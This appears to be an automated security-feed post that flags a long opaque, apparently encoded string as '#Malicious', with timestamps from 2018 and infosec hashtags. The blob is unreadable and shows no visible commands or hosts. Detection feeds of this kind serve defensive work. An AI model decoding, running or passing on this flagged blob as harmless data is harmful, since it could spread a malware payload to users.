TTdXkJdT4z_n58wpwA8UXG8X_Xm(GcNbX6n0PluZ7eld-R2HDy76zMXePafXUW_ohCQjFBkoxLT9F1cKgNtL6joAWrm1zZWiIRqixbJg4Je2tTdmPuVtzWIb5t6kpsncONc6m82XJMyuDhiXjUIBXX8DvqxQ4y3gyez3WRKsxNUdVSGb0Kjm7sJEXbgX2RW~8DDF0NcSgGONn9-DM(3SD5r8lKviHCAKIrdqIoXTrmg~DeFN71aJblbeL5198GkafGUN_ThHzXPUbIdLE5QTXGvusHp6mxtUsBRv5ndAGCjchzXTN3PS34ofVr0Po6NbFE5lwHRx8MYt00EgFKvwwcCdGRMXnGsvp5i5VOSBezTgcpzDb6l(S8vai91WSsaSSIFiJQnObSSkbK9S_ZCed1t(cIbqd71P5Yjc_hH5dQWkqnjPzc3uwF5f455jw~xAcxZVFTBKJd0mG62cNdWIxrzG_8JoKiyFKaPukK-il4LA3NRpZSiBieHiifJuUmaw0vz1iwSS7d2vLafECuKSz4IQh47Ush-upSMOf(UwGYWegDj3FtiA_GoV5cezeZF1d9gCaeWJT4jNxCqt4sozRy0dIShZ5kSS2qZA303WvylrlAzzzkAzPfEoQ87F54uMkdcrM7Q2bnjrTJnCdeTY5cU84SvMy2BboANEOjqOOmfPSFKs6H_R6G2ChikSfUjm6gxMXh5rScsRlnIoBi5wPWl65gbEfqbI5dq8Qh5KS7Pi3OPBf3GtJDVEGDXQecW3Ofut7k_jV9AozyeFxtUwr9i0UvM~QS1uPQ3ppMREURlo5hxsQvKnpMGrdwCxxRESlw_JsD75oC54Y257HNecmMvkGFQskt_GA8nMSczc7aY~nQhoCXmi4D9~ICPBV4AzGPKAxW52mP
Detected family: #Malicious
TheSystem Itself @ 2018-07-09 23:26:02
#infosec #automation
TheSystem Itself @ 2018-07-09 23:09:19